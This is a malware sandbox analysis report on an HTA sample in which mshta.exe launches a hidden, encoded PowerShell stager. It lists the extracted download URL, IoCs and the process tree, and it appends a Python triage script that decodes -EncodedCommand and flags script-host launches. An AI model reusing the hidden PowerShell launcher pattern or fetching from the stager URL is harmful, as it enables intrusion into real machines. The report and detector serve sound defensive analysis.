Analysis

max time kernel:  119s
max time network: 120s
platform:         windows7_x64
resource:         win7-20240221-en
resource tags:    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted:        30/05/2024, 01:23

Static task: static1

Behavioral task: behavioral1
  Sample:   9680a923973fc87e61964a372b083cb9420a4e6c721471806560a3489a649b88.hta
  Resource: win7-20240221-en

Behavioral task: behavioral2
  Sample:   9680a923973fc87e61964a372b083cb9420a4e6c721471806560a3489a649b88.hta
  Resource: win10v2004-20240508-en
General

Target: 9680a923973fc87e61964a372b083cb9420a4e6c721471806560a3489a649b88.hta
Size:   799B
MD5:    9b3779b6e809642232e8e7e187a72f0d
SHA1:   fd7027dc0258952655350a794854135452632fb3
SHA256: 9680a923973fc87e61964a372b083cb9420a4e6c721471806560a3489a649b88
SHA512: 3dbba3efa22911744f8be7fc87d8ac68a32f1a4b001af084c57bafe6b446a597417eb2fcab474dce66bbff0e4c04201acfee47c15c74dc9fae58679318e19da0
Malware Config

Extracted URL: http://powershell.skype-api.co.uk:80/download/ironpython/
Signatures

Blocklisted process makes network request (1 IoC)
  flow  pid   Process
  5     2212  powershell.exe

Command and Scripting Interpreter: PowerShell (1 IoC)
  pid   Process
  2212  powershell.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Modifies Internet Explorer settings (1 IoC)
  description  ioc                                                                                                       Process
  Key created  \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe

Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid   Process
  2212  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   Process
  Token: SeDebugPrivilege  2212  powershell.exe

Suspicious use of WriteProcessMemory (4 IoCs)
  description                       pid   Process    procid_target
  PID 1096 wrote to memory of 2212  1096  mshta.exe  28
  (the same write from mshta.exe into the powershell.exe child is recorded four times)
Processes

1. C:\Windows\SysWOW64\mshta.exe
   Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\9680a923973fc87e61964a372b083cb9420a4e6c721471806560a3489a649b88.hta"
   PID: 1096
   - Modifies Internet Explorer settings
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (child of PID 1096)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc 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
      PID: 2212
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

Note: the child's image path is under SysWOW64 although its command line names System32. The parent mshta.exe is the 32-bit (SysWOW64) build, so WoW64 file-system redirection resolves System32 to SysWOW64 and the PowerShell host that runs the stager is 32-bit, whatever the command line says. The -noP -sta -w 1 -enc switches are the unambiguous-prefix forms of -NoProfile, -STA, -WindowStyle Hidden and -EncodedCommand; the -enc argument is Base64 over UTF-16LE text, not UTF-8.
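The two checks a triager would run against this process tree, as an added example (this is not part of the sandbox report and not the sample's own code): decode a PowerShell -EncodedCommand argument, and flag a script host such as mshta.exe spawning a hidden, encoded PowerShell child. The process rows are constructed to mirror the report's tree (mshta.exe PID 1096 spawning powershell.exe PID 2212). The report's real -enc blob is not reproduced on the page, so a harmless constructed command is encoded the same way in its place; the SCRIPT_HOSTS list and the field names are assumptions.

```python
"""Triage helpers for an mshta.exe -> powershell.exe launch (added example).

The process rows and the encoded payload below are constructed; the real
sample's -enc argument is not available here.
"""
import base64
import re

# Parent images that should not normally spawn a PowerShell host
# (assumption: tune this list to the environment being monitored).
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}


def split_cmdline(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping quoted runs whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def _is_flag(token: str, name: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of a switch name:
    -enc, -ec and -e all mean -EncodedCommand, -w means -WindowStyle."""
    t = token.lstrip("-/").lower()
    return token[:1] in "-/" and bool(t) and name.startswith(t)


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries Base64 over UTF-16LE text, not UTF-8."""
    padded = blob + "=" * (-len(blob) % 4)
    return base64.b64decode(padded).decode("utf-16-le")


def analyze_powershell_cmdline(cmdline: str) -> dict:
    """Pull the switches that matter for a stager out of a command line."""
    toks = split_cmdline(cmdline)
    result = {"noprofile": False, "sta": False, "hidden": False,
              "encoded": None, "decoded": None}
    for i, tok in enumerate(toks):
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if _is_flag(tok, "noprofile"):
            result["noprofile"] = True
        elif _is_flag(tok, "sta"):
            result["sta"] = True
        elif _is_flag(tok, "windowstyle") and nxt.lower() in ("1", "hidden"):
            result["hidden"] = True
        elif _is_flag(tok, "encodedcommand") and nxt:
            result["encoded"] = nxt
            try:
                result["decoded"] = decode_encoded_command(nxt)
            except (ValueError, UnicodeDecodeError):
                result["decoded"] = None  # keep the raw blob, report no text
    return result


def find_script_host_launches(processes: list[dict]) -> list[dict]:
    """Flag a script host spawning powershell.exe and describe the child."""
    by_pid = {p["pid"]: p for p in processes}
    hits = []
    for child in processes:
        parent = by_pid.get(child["ppid"])
        if parent is None:
            continue
        if parent["image"].rsplit("\\", 1)[-1].lower() not in SCRIPT_HOSTS:
            continue
        if child["image"].rsplit("\\", 1)[-1].lower() != "powershell.exe":
            continue
        findings = analyze_powershell_cmdline(child["cmdline"])
        # Image under SysWOW64 while the command line names System32 means
        # WoW64 redirection applied: the child is a 32-bit PowerShell.
        findings["wow64_redirected"] = (
            "\\syswow64\\" in child["image"].lower()
            and "\\system32\\" in child["cmdline"].lower())
        hits.append({"parent_pid": parent["pid"], "child_pid": child["pid"],
                     "parent": parent["image"], **findings})
    return hits


# Constructed stand-in for the stager: a harmless command encoded the way
# powershell.exe expects (UTF-16LE, then Base64).
SAMPLE_ENC = base64.b64encode(
    "Write-Output 'constructed sample'".encode("utf-16-le")).decode()

# Constructed to mirror the report's process tree (PIDs and images as shown).
PROCESSES = [
    {"pid": 1096, "ppid": 0,
     "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmdline": r'C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\9680a923973fc87e61964a372b083cb9420a4e6c721471806560a3489a649b88.hta"'},
    {"pid": 2212, "ppid": 1096,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc ' + SAMPLE_ENC},
]

if __name__ == "__main__":
    for hit in find_script_host_launches(PROCESSES):
        print(hit)
```

Run against the constructed rows, the single hit carries parent 1096, child 2212, noprofile/sta/hidden all true, the decoded text of the constructed payload, and wow64_redirected true; on the real report the decoded field is where the stager that fetches the extracted URL would appear.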